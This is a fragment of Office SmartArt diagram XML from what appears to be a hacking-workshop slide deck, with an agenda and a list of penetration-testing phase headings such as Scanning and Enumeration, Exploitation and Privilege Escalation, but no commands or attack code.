    <dgm:pt modelId="{D2EC7499-ACE5-4BA0-B8AD-9B901CA43012}" type="pres">
      <dgm:prSet presAssocID="{25A890C4-879D-4EA3-BA01-D15CC35F48B4}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8F8DA2A2-E02B-4C28-83DB-BBBBD421B11C}" type="pres">
      <dgm:prSet presAssocID="{050186DE-B2B6-4253-B085-378747021C6C}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8B83981E-1D89-4D41-BBF2-B6D291DE37BC}" type="pres">
      <dgm:prSet presAssocID="{050186DE-B2B6-4253-B085-378747021C6C}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{79AAB5C7-6CAE-4443-89B6-D910B6DC4985}" type="pres">
      <dgm:prSet presAssocID="{050186DE-B2B6-4253-B085-378747021C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edle"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{62AF8703-05D1-4B03-A87B-D25832DFA167}" type="pres">
      <dgm:prSet presAssocID="{050186DE-B2B6-4253-B085-378747021C6C}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DDB88182-2743-48F1-84AC-679408B63A35}" type="pres">
      <dgm:prSet presAssocID="{050186DE-B2B6-4253-B085-378747021C6C}" presName="parTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{50F498FD-5094-E240-9750-559F780CA1CA}" type="pres">
      <dgm:prSet presAssocID="{191C9073-8A7E-4D75-9096-355366FA18FD}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9E51E102-984E-F64E-BF84-FB773D4B699A}" type="pres">
      <dgm:prSet presAssocID="{FB7B922F-4683-D94C-83ED-77B5DFA83FD6}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1C5D14A8-7048-1745-9EE4-81AF66224CB5}" type="pres">
      <dgm:prSet presAssocID="{FB7B922F-4683-D94C-83ED-77B5DFA83FD6}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{329B8F8D-3A6D-144E-A642-FC001EB27691}" type="pres">
      <dgm:prSet presAssocID="{FB7B922F-4683-D94C-83ED-77B5DFA83F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A069C75-A5EF-B04B-9A1A-8D43FEB68642}" type="pres">
      <dgm:prSet presAssocID="{FB7B922F-4683-D94C-83ED-77B5DFA83FD6}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A1063E43-FFC3-1745-B778-1CAE09D84993}" type="pres">
      <dgm:prSet presAssocID="{FB7B922F-4683-D94C-83ED-77B5DFA83FD6}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C15AE51A-EE45-BB4F-94A8-B17852A36745}" type="presOf" srcId="{FB7B922F-4683-D94C-83ED-77B5DFA83FD6}" destId="{A1063E43-FFC3-1745-B778-1CAE09D84993}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C2A41370-A85F-3E48-82E5-39A75B0192B5}" srcId="{5146DC9E-F0B1-4FD5-9BEB-839B15AE5A98}" destId="{FB7B922F-4683-D94C-83ED-77B5DFA83FD6}" srcOrd="2" destOrd="0" parTransId="{B844D8E5-5D65-6047-8678-34BAA0E9A5AA}" sibTransId="{CDB31850-999C-1948-8A10-9821998BC47F}"/>
    <dgm:cxn modelId="{9F551486-0057-43EA-9120-2BFDFF6997F1}" type="presOf" srcId="{050186DE-B2B6-4253-B085-378747021C6C}" destId="{DDB88182-2743-48F1-84AC-679408B63A35}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5EF2A495-77DB-49DA-818A-AA3A66C6999D}" type="presOf" srcId="{BA05245D-10F9-446B-A74A-CF009E489932}" destId="{EDAC498E-686D-459A-BF14-9E6D4B4C2473}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FAEE86AA-3CB9-4436-BD6E-D9D3D280A504}" type="presOf" srcId="{5146DC9E-F0B1-4FD5-9BEB-839B15AE5A98}" destId="{E6DDF0C4-605D-416C-B4A1-D1B4631097A8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{6AFB20B5-3728-4274-BB90-6BB92BA3968F}" srcId="{5146DC9E-F0B1-4FD5-9BEB-839B15AE5A98}" destId="{050186DE-B2B6-4253-B085-378747021C6C}" srcOrd="1" destOrd="0" parTransId="{06ACACC7-C0B8-4D3D-B2BA-5E9ADB163E0C}" sibTransId="{191C9073-8A7E-4D75-9096-355366FA18FD}"/>
    <dgm:cxn modelId="{F56412C4-00EE-4D42-BE6C-DE4BADE305D6}" srcId="{5146DC9E-F0B1-4FD5-9BEB-839B15AE5A98}" destId="{BA05245D-10F9-446B-A74A-CF009E489932}" srcOrd="0" destOrd="0" parTransId="{BBE21A5A-DFDB-4513-9BF6-47702D54D48A}" sibTransId="{25A890C4-879D-4EA3-BA01-D15CC35F48B4}"/>
    <dgm:cxn modelId="{B1BE1ABE-0A0B-4F94-A0AB-A3D80A08119B}" type="presParOf" srcId="{E6DDF0C4-605D-416C-B4A1-D1B4631097A8}" destId="{B7100F68-374B-40F4-96DF-DA5466297961}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C729A659-024E-492E-B373-EF0A9C33095D}" type="presParOf" srcId="{B7100F68-374B-40F4-96DF-DA5466297961}" destId="{35CE4538-930C-4B90-853C-9DE8966AF518}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{49838AA8-CC4D-405A-8934-0F2DB2A9B3E5}" type="presParOf" srcId="{B7100F68-374B-40F4-96DF-DA5466297961}" destId="{4846B682-492F-4273-A279-1BC785500E9C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5C37104B-313E-4D60-9038-AA7FE534CE61}" type="presParOf" srcId="{B7100F68-374B-40F4-96DF-DA5466297961}" destId="{30FEDD72-0E01-4E0B-90F0-49D5001DE857}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B58F4BB9-5DF4-42EC-9064-2F6E74E5BB81}" type="presParOf" srcId="{B7100F68-374B-40F4-96DF-DA5466297961}" destId="{EDAC498E-686D-459A-BF14-9E6D4B4C2473}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{07BD99DA-06C2-4668-8FAD-853DE0EBAEEE}" type="presParOf" srcId="{E6DDF0C4-605D-416C-B4A1-D1B4631097A8}" destId="{D2EC7499-ACE5-4BA0-B8AD-9B901CA43012}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{0CD61D44-95FF-45F4-8161-A6F8DC50630C}" type="presParOf" srcId="{E6DDF0C4-605D-416C-B4A1-D1B4631097A8}" destId="{8F8DA2A2-E02B-4C28-83DB-BBBBD421B11C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{1BFEF8AA-DEB3-436E-B6DA-1E3B69AF89E0}" type="presParOf" srcId="{8F8DA2A2-E02B-4C28-83DB-BBBBD421B11C}" destId="{8B83981E-1D89-4D41-BBF2-B6D291DE37BC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{15AE00D4-85ED-418C-BCF2-ACB61FA6C1A7}" type="presParOf" srcId="{8F8DA2A2-E02B-4C28-83DB-BBBBD421B11C}" destId="{79AAB5C7-6CAE-4443-89B6-D910B6DC4985}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{46A024AA-FFDE-49B0-95AE-C2D8ED37D6CC}" type="presParOf" srcId="{8F8DA2A2-E02B-4C28-83DB-BBBBD421B11C}" destId="{62AF8703-05D1-4B03-A87B-D25832DFA167}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{AA3200CD-4915-442F-8D09-08C918F82CB5}" type="presParOf" srcId="{8F8DA2A2-E02B-4C28-83DB-BBBBD421B11C}" destId="{DDB88182-2743-48F1-84AC-679408B63A35}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{378876A6-8639-B242-A69D-5788781949B3}" type="presParOf" srcId="{E6DDF0C4-605D-416C-B4A1-D1B4631097A8}" destId="{50F498FD-5094-E240-9750-559F780CA1CA}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{A637660B-CE67-E247-9098-B9643CB39E9F}" type="presParOf" srcId="{E6DDF0C4-605D-416C-B4A1-D1B4631097A8}" destId="{9E51E102-984E-F64E-BF84-FB773D4B699A}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{AECE40B2-BCC4-4B41-892B-DAD92CD5D1BA}" type="presParOf" srcId="{9E51E102-984E-F64E-BF84-FB773D4B699A}" destId="{1C5D14A8-7048-1745-9EE4-81AF66224CB5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B7CD9418-88D9-D143-9FE5-7D2130FCE64B}" type="presParOf" srcId="{9E51E102-984E-F64E-BF84-FB773D4B699A}" destId="{329B8F8D-3A6D-144E-A642-FC001EB27691}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D600CE48-59CA-764A-B859-209397B90A34}" type="presParOf" srcId="{9E51E102-984E-F64E-BF84-FB773D4B699A}" destId="{9A069C75-A5EF-B04B-9A1A-8D43FEB68642}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{1F4DAA8C-C022-EC4F-8319-A22C8E1E8E27}" type="presParOf" srcId="{9E51E102-984E-F64E-BF84-FB773D4B699A}" destId="{A1063E43-FFC3-1745-B778-1CAE09D849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65451-218E-4252-88E2-7D9664E4A168}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1063980" y="719741"/>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E2E15B-5329-453A-B4DE-08F51F70E372}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="285097"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Hacking: Tools and techniques</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="285097" y="2346338"/>
        <a:ext cx="2832300" cy="720000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F940134A-B307-4531-8786-1E696B0E2FAC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4391932" y="719741"/>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A82742-9F16-4EAA-AFEF-9C0845121DA2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3613050"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Lunch</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>(11:30 – 12:30)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3613050" y="2346338"/>
        <a:ext cx="2832300" cy="720000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A2530889-7285-4DFE-A702-B5937D2F6CB5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7719885" y="719741"/>
          <a:ext cx="1274535" cy="127453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6A265D-9E33-49F1-BFA1-901D425A92E8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6941002"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Hack</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>(12:30 – 1:30)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6941002" y="2346338"/>
        <a:ext cx="28323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4F3DC-D491-4459-8D5C-A055C70E6E87}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3946"/>
          <a:ext cx="6910387" cy="840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676437-86DB-485F-9635-BD51C998B2E6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="254278" y="193078"/>
          <a:ext cx="462323" cy="4623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B256F9-1A75-40CB-BCBE-8A9F26E2838C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="970879" y="3946"/>
          <a:ext cx="5939507" cy="840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62" tIns="88962" rIns="88962" bIns="88962" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>Scope and Rules of Engagement</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="970879" y="3946"/>
        <a:ext cx="5939507" cy="840588"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A36B02A7-59A3-426F-B603-3920425DE26F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1054682"/>
          <a:ext cx="6910387" cy="840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68BEC1-687F-4E0E-8423-023D443004E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="254278" y="1243814"/>
          <a:ext cx="462323" cy="4623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C9ED47-20CB-488E-BA89-45D2E1A73A3D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="970879" y="1054682"/>
          <a:ext cx="5939507" cy="840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62" tIns="88962" rIns="88962" bIns="88962" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>Scanning and Enumeration</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="970879" y="1054682"/>
        <a:ext cx="5939507" cy="840588"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E16B08-EA1A-492A-8D2B-EF883433C33A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2105418"/>
          <a:ext cx="6910387" cy="840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B9F34-4F06-4110-8B62-E1B776076E82}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="254278" y="2294550"/>
          <a:ext cx="462323" cy="46232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98A641-5468-4E81-9B6C-E67EDD5023C1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="970879" y="2105418"/>
          <a:ext cx="5939507" cy="840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62" tIns="88962" rIns="88962" bIns="88962" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>Exploitation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="970879" y="2105418"/>
        <a:ext cx="5939507" cy="840588"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4DA4D047-3135-46E0-98A5-ED174EA4B1C9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3156154"/>
          <a:ext cx="6910387" cy="840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93219D-C5EC-46BE-B695-8DA864C8CD42}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="254278" y="3345286"/>
          <a:ext cx="462323" cy="4623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59A86C-DAB9-4843-AF9A-CFCAAD65D9E1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="970879" y="3156154"/>
          <a:ext cx="5939507" cy="840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62" tIns="88962" rIns="88962" bIns="88962" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>Privilege Escalation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="970879" y="3156154"/>
        <a:ext cx="5939507" cy="840588"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1726CD9B-E662-4378-A9B2-C6E525AF990F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4206889"/>
          <a:ext cx="6910387" cy="840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464312-F93C-4C32-B8B0-B01AA79186B3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="254278" y="4396022"/>
          <a:ext cx="462323" cy="4623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CC89B4-6830-4A0A-A6EA-1A723B2B473D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="970879" y="4206889"/>
          <a:ext cx="5939507" cy="840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62" tIns="88962" rIns="88962" bIns="88962" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>Pillaging and Post Exploitation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="970879" y="4206889"/>
        <a:ext cx="5939507" cy="8405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4F3DC-D491-4459-8D5C-A055C70E6E87}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3946"/>
          <a:ext cx="6910387" cy="840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676437-86DB-485F-9635-BD51C998B2E6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="254278" y="193078"/>
          <a:ext cx="462323" cy="4623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B256F9-1A75-40CB-BCBE-8A9F26E2838C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="970879" y="3946"/>
          <a:ext cx="5939507" cy="840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62" tIns="88962" rIns="88962" bIns="88962" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" strike="sngStrike" kern="1200"/>
            <a:t>Scope and Rules of Engagement</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="970879" y="3946"/>
        <a:ext cx="5939507" cy="840588"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A36B02A7-59A3-426F-B603-3920425DE26F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1054682"/>
          <a:ext cx="6910387" cy="840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68BEC1-687F-4E0E-8423-023D443004E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="254278" y="1243814"/>
          <a:ext cx="462323" cy="4623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C9ED47-20CB-488E-BA89-45D2E1A73A3D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="970879" y="1054682"/>
          <a:ext cx="5939507" cy="840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62" tIns="88962" rIns="88962" bIns="88962" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>Scanning and Enumeration</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="970879" y="1054682"/>
        <a:ext cx="5939507" cy="840588"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E16B08-EA1A-492A-8D2B-EF883433C33A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2105418"/>
          <a:ext cx="6910387" cy="840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B9F34-4F06-4110-8B62-E1B776076E82}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="254278" y="2294550"/>
          <a:ext cx="462323" cy="46232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98A641-5468-4E81-9B6C-E67EDD5023C1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="970879" y="2105418"/>
          <a:ext cx="5939507" cy="840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62" tIns="88962" rIns="88962" bIns="88962" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>Exploitation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="970879" y="2105418"/>
        <a:ext cx="5939507" cy="840588"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4DA4D047-3135-46E0-98A5-ED174EA4B1C9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3156154"/>
          <a:ext cx="6910387" cy="840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93219D-C5EC-46BE-B695-8DA864C8CD42}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="254278" y="3345286"/>
          <a:ext cx="462323" cy="4623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59A86C-DAB9-4843-AF9A-CFCAAD65D9E1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
